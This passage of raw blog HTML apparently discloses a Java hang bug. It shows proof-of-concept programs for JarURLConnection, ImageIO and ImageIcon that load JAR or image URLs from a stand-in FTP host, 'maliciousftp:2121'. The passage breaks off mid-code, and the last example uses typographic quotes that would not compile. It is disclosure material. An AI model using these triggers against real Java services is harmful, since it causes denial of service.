crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.io.IOException;\nimport java.net.JarURLConnection;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.jar.Manifest;\n\npublic class JavaUrl {\n\n    public static void main(String[] args) {\n        URL url = null;\n        try {\n            url = new URL(\"jar:ftp:\/\/maliciousftp:2121\/duke.jar!\/\");\n        } catch (MalformedURLException e) {\n            e.printStackTrace();\n        }\n        JarURLConnection jarConnection = null;\n        try {\n            jarConnection = (JarURLConnection) url.openConnection();\n            jarConnection.setConnectTimeout(5000);\n            jarConnection.setReadTimeout(5000);\n\n        } catch (IOException e1) {\n            e1.printStackTrace();\n        }\n        try {\n            \/\/ getManifest() connects and fetches the JAR over FTP; per the advisory, the thread\n            \/\/ waits indefinitely if the FTP server exits during RETR\n            Manifest manifest = jarConnection.getManifest();\n        } catch (IOException e) {\n            e.printStackTrace();\n        }\n    }\n}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IOException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JarURLConnection<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">util<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">jar<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">Manifest<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-7\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JavaUrl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-12\"><span 
class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;jar:ftp:\/\/maliciousftp:2121\/duke.jar!\/&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JarURLConnection <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-59a739de8f0a3686072524-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">JarURLConnection<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">openConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setConnectTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setReadTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">IOException <\/span><span class=\"crayon-v\">e1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-23\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-24\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-25\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-26\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">Manifest <\/span><span class=\"crayon-v\">manifest<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getManifest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-27\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-28\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-29\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-30\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-31\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong>javax.imageio.ImageIO Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59a739de8f0a6660483781\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\"
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">awt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Image<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IOException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">imageio<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIO<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIcon<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JFrame<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JLabel<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-9\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageReader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Image <\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;ftp:\/\/maliciousftp:2121\/test.jpg&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ImageIO<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JFrame <\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JFrame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-20\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setSize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">300<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-59a739de8f0a6660483781-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JLabel <\/span><span class=\"crayon-v\">label<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JLabel<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageIcon<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">label<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">frame<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setVisible<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a6660483781-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-25\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong>javax.swing.ImageIcon Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59a739de8f0a8039982121\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\"
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">swing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ImageIcon<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-5\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageXcon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-8\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-11\"><span 
class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">ImageIcon <\/span><span class=\"crayon-v\">icon<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ImageIcon<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">imgURL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">description<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a8039982121-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a8039982121-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span 